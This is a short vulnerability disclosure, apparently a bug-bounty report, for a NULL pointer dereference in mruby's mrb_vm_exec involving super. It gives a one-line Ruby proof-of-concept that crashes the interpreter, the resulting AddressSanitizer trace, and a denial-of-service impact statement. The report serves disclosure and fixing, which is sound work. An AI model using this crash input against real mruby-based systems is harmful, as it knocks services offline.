Description

NULL Pointer Dereference in mrb_vm_exec with super

Proof of Concept

o13 = Comparable.initialize(){||0x7f.instance_eval() do super rescue caller (0..1).sort_by() do break end end } // PoC.js ./mruby 1.rb

#Result ASAN:DEADLYSIGNAL ================================================================= ==19163==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x55bde3b4162d bp 0x7ffcbe8d7ab0 sp 0x7ffcbe8d63c0 T0) ==19163==The signal is caused by a READ memory access. ==19163==Hint: address points to the zero page. #0 0x55bde3b4162c in mrb_vm_exec /home/xxx/mruby/src/vm.c:1752 #1 0x55bde3b31512 in mrb_vm_run /home/xxx/mruby/src/vm.c:1131 #2 0x55bde3b7b219 in mrb_run /home/xxx/mruby/src/vm.c:3034 #3 0x55bde3b2fbc9 in mrb_yield_with_class /home/xxx/mruby/src/vm.c:879 #4 0x55bde3b0b521 in mrb_mod_initialize /home/xxx/mruby/src/class.c:1648 #5 0x55bde3b3fb19 in mrb_vm_exec /home/xxx/mruby/src/vm.c:1640 #6 0x55bde3b31512 in mrb_vm_run /home/xxx/mruby/src/vm.c:1131 #7 0x55bde3b7b42b in mrb_top_run /home/xxx/mruby/src/vm.c:3047 #8 0x55bde3bedb2a in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6890 #9 0x55bde3bede42 in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6933 #10 0x55bde3afc128 in main /home/xxx/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357 #11 0x7f98eb47ec86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #12 0x55bde3af9339 in _start (/home/xxx/mruby/bin/mruby+0xc2339)

AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/xxx/mruby/src/vm.c:1752 in mrb_vm_exec ==19163==ABORTING

Impact

This vulnerability is capable of making the mruby interpreter crash, thus affecting the availability of the system.